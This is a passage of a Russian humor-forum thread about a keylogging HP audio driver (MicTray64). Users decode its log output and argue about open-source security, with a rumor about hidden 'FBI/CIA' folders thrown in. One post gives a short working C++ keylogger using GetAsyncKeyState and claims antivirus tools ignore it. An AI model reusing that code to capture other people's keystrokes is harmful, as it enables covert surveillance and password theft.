Тотальная слежка: Драйвера для звуковых карт в ноутбуках НР вот уже два года поставляются со встроенным кейлоггером

[ Версия для печати ]
Добавить в Telegram Добавить в Twitter Добавить в Вконтакте Добавить в Одноклассники
Страницы: (4) 1 2 [3] 4   К последнему непрочитанному [ ОТВЕТИТЬ ] [ НОВАЯ ТЕМА ]
nemecc
16.05.2017 - 16:43
0
Статус: Online


Праведное Зло

Регистрация: 27.07.13
Сообщений: 3638
Боже да всем насрать! Я уже давно понял, что в нынешнем мире, чем меньше хранишь на компе тем лучше. Максимум на ЯПе темы позырить и список продуктов для магаза! :)
 
[^]
666Ghost666
16.05.2017 - 16:54
0
Статус: Offline


ctrl+c ctrl+v

Регистрация: 5.08.11
Сообщений: 4828
Цитата (ciph @ 16.05.2017 - 09:50)
Ужас! zombie.gif Это получается что меня слышали когда я фапал перед ноутом?? faceoff.gif

Если камеру не заклеил, то ещё и видели.
 
[^]
bay12
16.05.2017 - 17:03
0
Статус: Offline


Балагур

Регистрация: 15.03.17
Сообщений: 804
Цитата (Primus525 @ 16.05.2017 - 14:55)
Цитата (Stapleton @ 16.05.2017 - 09:37)
А почему этим занимается звуковой драйвер, а не клавиатурный? Где логика?

звуковой драйвер ловит хоткеи, чтоб управлять звуком.

Это-то понятно. Не понятно, зачем он его в файл пишет) Вот тут-то и закрадываются нехорошие подозрения)) Ну слушаешь ты нажатые клавиши, услышал ненужные - пофиг, услышал нужную - выполнил действие. Писать-то это все зачем?
 
[^]
Валеха
16.05.2017 - 17:20
0
Статус: Offline


Ярила

Регистрация: 18.10.13
Сообщений: 3815
Цитата (vic4884 @ 16.05.2017 - 08:00)
вот не зря я никогда не любил ноутбуки HP...не зря

А я доволен HP, и такой хуйни файлов не нашёл why.gif Да и похуй-Винда похлеще сексотит, и ничего, всем похуй cool.gif
 
[^]
brync
16.05.2017 - 17:26
0
Статус: Offline


Ярила

Регистрация: 13.01.11
Сообщений: 3949
Цитата (Ficus @ 16.05.2017 - 09:16)
Цитата (БелыеТапочки @ 16.05.2017 - 08:07)
Цитата
Пойду на всякий случай ноут выкину.

Я ещё и кабель ростелекомовский рубанул,шоб на 100 % ваще всё.

Не надо нагнетать. Все это делается для нашего же блага, в целях борьбы с международным терроризмом. Как известно, Аль-Кайда и Игил питают слабость к технике HP. Вот американская компания и приняла меры, чтобы собирать пароли с пользователей. Таким образом, АНБ скоро найдет пароли террористческий ячеек, засевших в США и Еворпе и готовящих теракты против невинных людей.

Ага!
Эти злодеи вообще к любой технике тяготеют! rulez.gif
И на iOs'e, и на Винде, и на Андроиде...
Полигамные техникофилы, а не воины Аллаха! gigi.gif

Это сообщение отредактировал brync - 16.05.2017 - 17:26
 
[^]
Гуракча
16.05.2017 - 17:55
0
Статус: Offline


Хохмач

Регистрация: 23.08.16
Сообщений: 605
Цитата (bay12 @ 16.05.2017 - 17:03)
Цитата (Primus525 @ 16.05.2017 - 14:55)
Цитата (Stapleton @ 16.05.2017 - 09:37)
А почему этим занимается звуковой драйвер, а не клавиатурный? Где логика?

звуковой драйвер ловит хоткеи, чтоб управлять звуком.

Это-то понятно. Не понятно, зачем он его в файл пишет) Вот тут-то и закрадываются нехорошие подозрения)) Ну слушаешь ты нажатые клавиши, услышал ненужные - пофиг, услышал нужную - выполнил действие. Писать-то это все зачем?

не успевает, панимаш, пока кнопа нажалась, надо сделать соответствующее событие. В этот момент снова кнопа нажалась, пока делалось событие, прога пропустила нажатие следующей кнопы и программа облажалась, чё не понятно? Надо записывать, потом неспешно все события выпонять, мало ли... rulez.gif
 
[^]
Seguramigo
16.05.2017 - 18:24
0
Статус: Offline


Ярила

Регистрация: 18.08.15
Сообщений: 1002
Еще не набежали "кому-мы-нужны-это-все-шизофрения"? )))))
Странно))))) Я думал, что они всегда, даже не по теме доказывают, что все сделанное - для удобства пользователя. Хотя, в целом они правы, вопрос только для какого пользователя)))))
 
[^]
lumy
16.05.2017 - 18:28
1
Статус: Offline


Говорящий с облаками

Регистрация: 11.10.12
Сообщений: 2082
Цитата (Стоматолог @ 16.05.2017 - 14:26)
Кейлоггер может с завода стоять закладкой хоть в южном мосту,
хоть в любом официальном драйвере, в любой официальной программе.
Хоть даже в Амиго и Яндек-Баре.

Ты че сказал, нехристь?! С Амиго такого быть не может!!!
 
[^]
Amok555
16.05.2017 - 18:32
1
Статус: Offline


Ярила

Регистрация: 29.04.08
Сообщений: 16474
Цитата (Narkozzz @ 16.05.2017 - 10:48)
Amok555
Цитата
Открытый код все-таки это открытый код.

Ага, если только у тебя весь софт собран тобою из кода, который ты смотрел. Стоит на сутки заменить код в репозитории на исправленный, а потом вернуть назад чистый - и тысячи ничего не подозревающих юзеров получат софт из открытого кода с трояном. И потом - кто контроллирует сборщиков пакетов для дистрибутивов? Что толку от открытого кода, если ты поставил из пакета?

Ага. А ты попробуй этот код вернуть)) Я же спецом написал - стейбл. Это даже не анстейбл будет, а экспериментал. Проверяют и постят все ментейнеры. Они же повышают ранг дистрибутива после тестов. Там все не так просто. "Изменить" не прокатит. А код видят тысячи пользователей, которые знают как его читать - поэтому да, отчасти стабильный открытый код - наилучшая гарантия.
 
[^]
lumy
16.05.2017 - 18:34
1
Статус: Offline


Говорящий с облаками

Регистрация: 11.10.12
Сообщений: 2082
Цитата (Narkozzz @ 16.05.2017 - 14:49)
Миллхэвен
Цитата
А уж если очень надо зашифроваться, то реализовать гостовый алгоритм - не сверхсложная задача. Зато в нем нет бекдоров.

Так и надежность его для профессионала будет низкой, если вы конечно не из тех единиц математиков-криптографов.

Дааа? Вот сейчас по всему миру заплакали жертвы всех Рансомов вообще и ВоннаКрай персольнально. Они все используют штатное шифрование винды и хер ты это PGP откроешь. точнее, если откроешь, то Нобелевская Премия Мира гарантирована (за вклад в математику нету).

ЗЫ Точнее теория не запрещает, но таких вычислительных мощностей нет в сумме. Хоть всеми компами и смартами считай. А если вдруг появятся, то увеличат длинну ключа и опять писец-невскрываемо. Только брутфорс. Алгоритма нет чисто из теории.

ЗЗЫ 4линуксоиды. PGP придумывалось под UNIX- у вас точно такой же модуль шифрования, только права получить сложнее (и то уже не факт). В винде воще дофига всего сперто из униха. Начинаешь отслеживать зависимости: класс-обертка, в нем еще обертка, в нем еще 5... "бля, я это уже видел!"- стандартный никсовый tcpip.h (даже коменты теже стоят, сравнивал с тем же хидером в QNX)...

Это сообщение отредактировал lumy - 16.05.2017 - 18:55
 
[^]
organica
16.05.2017 - 18:35
0
Статус: Offline


Ярила

Регистрация: 18.06.12
Сообщений: 1564
охоспади! вы ещё про пунтосвичер расскажите, новость, тоже блин...
по факту - мы все умрём, ну а пока я схожу посру deg.gif
 
[^]
Amok555
16.05.2017 - 18:43
0
Статус: Offline


Ярила

Регистрация: 29.04.08
Сообщений: 16474
Цитата (gala1186 @ 16.05.2017 - 10:25)
Файлик лог есть, но кто сможет это понять? вот например кусочек:

MicTray64.exe(tid 994) 10:[ J_DEVICE] - GetSettingsFromRegistry

MicTray64.exe(tid 994) 10:[ J_DEVICE] - RegOpenKey is 2
MicTray64.exe(tid 994) 10:[ J_DEVICE] - GetSettingsFromRegistry

MicTray64.exe(tid 994) 10:[ J_DEVICE] - RegOpenKey is 2
MicTray64.exe(tid 994) 20:[ J_DEVICE] - Attempt to Register the device notification.

MicTray64.exe(tid 994) 20:[ J_DEVICE] - RegisterDeviceNotification() successfully.

MicTray64.exe(tid 994) 20:[ J_DEVICE] - OnDeviceChanged OpenDevice

MicTray64.exe(tid 994) 1206:[ J_DEVICE] - RegisterUnloadEvent

MicTray64.exe(tid 994) 1206:[ J_DEVICE] - Attempt to Register Unload Event.

MicTray64.exe(tid 994) 1206:[ J_DEVICE] - RegisterUnloadEvent() successfully.

MicTray64.exe(tid 994) 1471:[ J_STATE] - Multistream mode 1
MicTray64.exe(tid 994) 1471:[ J_STATE] - Get Invalid handle
MicTray64.exe(tid 994) 8834:[ J_WMSG] - WM_DEVICECHANGE message received

MicTray64.exe(tid 994) 104946:[ J_STATE] - Mic target 0x1 scancode 0x13 flags 0x0 extra 0x0 vk 0x52

MicTray64.exe(tid 994) 105008:[ J_STATE] - Mic target 0x1 scancode 0x13 flags 0x80 extra 0x0 vk 0x52

MicTray64.exe(tid 994) 105070:[ J_STATE] - Mic target 0x1 scancode 0x16 flags 0x0 extra 0x0 vk 0x55

MicTray64.exe(tid 994) 105133:[ J_STATE] - Mic target 0x1 scancode 0x16 flags 0x80 extra 0x0 vk 0x55

MicTray64.exe(tid 994) 105570:[ J_STATE] - Mic target 0x1 scancode 0x2e flags 0x0 extra 0x0 vk 0x43

MicTray64.exe(tid 994) 105616:[ J_STATE] - Mic target 0x1 scancode 0x2e flags 0x80 extra 0x0 vk 0x43

MicTray64.exe(tid 994) 105913:[ J_STATE] - Mic target 0x1 scancode 0x23 flags 0x0 extra 0x0 vk 0x48

MicTray64.exe(tid 994) 105960:[ J_STATE] - Mic target 0x1 scancode 0x23 flags 0x80 extra 0x0 vk 0x48

MicTray64.exe(tid 994) 111045:[ J_STATE] - Mic target 0x1 scancode 0x2a flags 0x0 extra 0x0 vk 0xa0

Тут не все, да?) Все доступно и понятно.

Получение ключей из реестра. Как только девайс начинает юзаться открываем его, отключаем события, включаем режим оповещения дополнительного устройства (программы), дальше должно быть что-то вроде RegisterLoadEvent и дальнейшая работа)

Все это - названия вызываемых функций.

Ну и настройка регистров ниже)
 
[^]
BoaSoft
16.05.2017 - 19:13
1
Статус: Online


Ярила

Регистрация: 19.03.14
Сообщений: 1899
Цитата (gala1186 @ 16.05.2017 - 10:25)
Файлик лог есть, но кто сможет это понять? вот например кусочек:
successfully.

MicTray64.exe(tid  994) 104946:[  J_STATE] - Mic target 0x1 scancode 0x13 flags 0x0 extra 0x0 vk 0x52

MicTray64.exe(tid  994) 105008:[  J_STATE] - Mic target 0x1 scancode 0x13 flags 0x80 extra 0x0 vk 0x52

MicTray64.exe(tid  994) 105070:[  J_STATE] - Mic target 0x1 scancode 0x16 flags 0x0 extra 0x0 vk 0x55

MicTray64.exe(tid  994) 105133:[  J_STATE] - Mic target 0x1 scancode 0x16 flags 0x80 extra 0x0 vk 0x55

MicTray64.exe(tid  994) 105570:[  J_STATE] - Mic target 0x1 scancode 0x2e flags 0x0 extra 0x0 vk 0x43

MicTray64.exe(tid  994) 105616:[  J_STATE] - Mic target 0x1 scancode 0x2e flags 0x80 extra 0x0 vk 0x43

MicTray64.exe(tid  994) 105913:[  J_STATE] - Mic target 0x1 scancode 0x23 flags 0x0 extra 0x0 vk 0x48

MicTray64.exe(tid  994) 105960:[  J_STATE] - Mic target 0x1 scancode 0x23 flags 0x80 extra 0x0 vk 0x48

MicTray64.exe(tid  994) 111045:[  J_STATE] - Mic target 0x1 scancode 0x2a flags 0x0 extra 0x0 vk 0xa0


scancode 0x2a - то, чтотдравер клавы выдает.

extra 0x0 - скорее всего сочтояния модификаторов (шифт-контрол итд)

vk 0x52 - код клавиши

flags 0x80 - нажатие
flags 0x80 - отпускание

Кусок из Winapi.Windows;

Код

VK_INSERT = vkInsert; {45}
 {$EXTERNALSYM VK_DELETE}
 VK_DELETE = vkDelete; {46}
 {$EXTERNALSYM VK_HELP}
 VK_HELP = vkHelp; {47}
{ VK_0 thru VK_9 are the same as ASCII '0' thru '9' ($30 - $39) }
{ VK_A thru VK_Z are the same as ASCII 'A' thru 'Z' ($41 - $5A) }
 {$EXTERNALSYM VK_LWIN}
 VK_LWIN = vkLWin; {91}
 {$EXTERNALSYM VK_RWIN}
 VK_RWIN = vkRWin; {92}


Это сообщение отредактировал BoaSoft - 16.05.2017 - 19:16
 
[^]
CrazyDoppel
16.05.2017 - 19:22
2
Статус: Offline


Хохмач

Регистрация: 21.01.14
Сообщений: 630
Цитата (Amok555 @ 16.05.2017 - 10:08)
Цитата (Narkozzz @ 16.05.2017 - 09:35)
BattlePorQ
Цитата
Вместо стандартных драйверов в ядре linux )

Вы давно делали ревизию кода всех установленных у вас приложений и ядра?

Открытый код все-таки это открытый код. Всегда можно прочесть что там нафигачено. Таких двухлетних косяков в таком софте - не будет (ок, пусть будет корректнее - вероятность их крайне мала). Достаточно пользоваться стейбл версией и будет все норм) Не обязательно для этого каждому пользователю при каждой загрузке весь код операционки перелопачивать)

У линукса все-же немного другой подход к безопасности.

Ну да, потому весь мир сидел с 11 до 14 год с дырой размером с жопу порно-актрисы aka heartbleed gigi.gif
 
[^]
coolerok
16.05.2017 - 19:33
0
Статус: Offline


Хохмач

Регистрация: 22.04.11
Сообщений: 602
Цитата (Jus @ 16.05.2017 - 15:56)
Что касается компании HP, то ее представители уже ознакомились с проблемой и заявили, что сотрудники ликвидируют проблему в ближайшее время. «Мы нашли решение и сделаем его доступным для наших пользователей», — заявили в компании.

Они, блядь, ознакомились с проблемой! Хуйли с ней знакомиться - она у вас (я про компанию) в технической документации подробно описана. Но особо эпично то, что эти ахуевшие нашли решение! Они нашли его, Ганс! (карл заебал уже). Небось месяц думали - как бы, блядь, решить эту нетривиальную проблему. Да просто - выпилить нахуй этот функционал и все.

Нихуя не удивлюсь, если выпиливание функционала сводится к закомментированию одной строчки кода:

// auto keyLogger = new KeyLogger();

Вот же гандоны какие, а...
 
[^]
пидагок
16.05.2017 - 19:40
1
Статус: Offline


Ярила

Регистрация: 5.07.05
Сообщений: 2799
Первым делом довольный покупатель ноутбука что делает? Заклеивает веб-камеру!
 
[^]
Spawn2010
16.05.2017 - 19:41
1
Статус: Offline


Весельчак

Регистрация: 28.05.15
Сообщений: 104
LINUX X U B U N T U у меня, прочитал слово в виндовс и успокоился )

Это сообщение отредактировал Spawn2010 - 16.05.2017 - 19:42
 
[^]
gnombliad
16.05.2017 - 19:46
0
Статус: Offline


Ярила

Регистрация: 26.02.16
Сообщений: 3384
Хорошо что мой HP сдох нахуй gigi.gif
 
[^]
Amok555
16.05.2017 - 20:09
0
Статус: Offline


Ярила

Регистрация: 29.04.08
Сообщений: 16474
Цитата (CrazyDoppel @ 16.05.2017 - 19:22)
Цитата (Amok555 @ 16.05.2017 - 10:08)
Цитата (Narkozzz @ 16.05.2017 - 09:35)
BattlePorQ
Цитата
Вместо стандартных драйверов в ядре linux )

Вы давно делали ревизию кода всех установленных у вас приложений и ядра?

Открытый код все-таки это открытый код. Всегда можно прочесть что там нафигачено. Таких двухлетних косяков в таком софте - не будет (ок, пусть будет корректнее - вероятность их крайне мала). Достаточно пользоваться стейбл версией и будет все норм) Не обязательно для этого каждому пользователю при каждой загрузке весь код операционки перелопачивать)

У линукса все-же немного другой подход к безопасности.

Ну да, потому весь мир сидел с 11 до 14 год с дырой размером с жопу порно-актрисы aka heartbleed gigi.gif

Не без этого)) Бывают и такие косяки)
 
[^]
Narkozzz
16.05.2017 - 20:24
0
Статус: Offline


Гойдофоб

Регистрация: 8.06.10
Сообщений: 26896
Amok555
Так что тысячи глаз и стейбл - не гарантия.

lumy
Речь выше шла о самописных алгоритмах, а не технологическом стандарте. С технологическим стандартом тоже все непросто - криптография наука сложная, алгоритм проверить на коллизии непросто
 
[^]
yukisaw
16.05.2017 - 20:29
0
Статус: Offline


Хохмач

Регистрация: 9.09.11
Сообщений: 769
Пфф, тоже мне открытие. Один фиг там каша из данных и выудить оттуда какую-то конкретную инфу тот еще гемор. Так что какой-либо взлом через это возможен только конкретно нацеленный, а если есть возможноть слямзить этот лог, то думаю можно найти возможность впаять нормальный кейлогер в систему.

Ну и так, для общего ознакомления - элементарнейший кейлогер на плюсах (тоже антивирям пофиг на такое поведение):

#include <iostream>
#include <Windows.h>

int main()
{
        bool keys[256] = { false };
        while (true)
        {
                int key_code = 0;
                for (bool& key : keys) key = GetAsyncKeyState(key_code++);
                for (char c = ' '; c <= 'z'; ++c) if (keys[c]) std::cout << c;
        }
}
 
[^]
horrordash
16.05.2017 - 20:50
0
Статус: Offline


Ярила

Регистрация: 1.08.09
Сообщений: 2178
когда-то давно, лет 10 назад поставил нам в контору HP партию десктопов, с предустановленной виндой. поскольку у нас винда корпоративная, предустановленную сносили и ставили свою. а я чего-то решил перед сносом заглянуть че там на винте, так вот при загрузке с CD появились папочки C:\FBI и C:\CIA которые в установленной родной винде никак не были видны :)
внутри программки... к сожалению не сохранил :(
 
[^]
americano
16.05.2017 - 21:05
0
Статус: Offline


Ярила

Регистрация: 11.09.11
Сообщений: 4985
Цитата (666Ghost666 @ 16.05.2017 - 16:54)
Цитата (ciph @ 16.05.2017 - 09:50)
Ужас! zombie.gif Это получается что меня слышали когда я фапал перед ноутом??  faceoff.gif

Если камеру не заклеил, то ещё и видели.

Я видел кино, которое также начиналось
 
[^]
Tigerchuk
16.05.2017 - 21:08
0
Статус: Offline


Шутник

Регистрация: 14.08.15
Сообщений: 90
А чо будет? Кейлогер направит америкосам , ну или в HP или куда нить еще что вы ищете в поисковиках? Или пишете что кому?
 
[^]
AbnormalSys
16.05.2017 - 21:24
0
Статус: Offline


Хохмач

Регистрация: 25.04.14
Сообщений: 726
HP elitedesk 800 + Дровлённый моник иховый E221c при коннекте ч-з цифру (или VGA+USB)

Вполне себе слушать и видеть юзеров позволяет, кста.. это фирменная ФИЧА!
 
[^]
Понравился пост? Еще больше интересного в Телеграм-канале ЯПлакалъ!
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии. Авторизуйтесь, пожалуйста, или зарегистрируйтесь, если не зарегистрированы.
1 Пользователей читают эту тему (1 Гостей и 0 Скрытых Пользователей) Просмотры темы: 36808
0 Пользователей:
Страницы: (4) 1 2 [3] 4  [ ОТВЕТИТЬ ] [ НОВАЯ ТЕМА ]


 
 



Активные темы






Наверх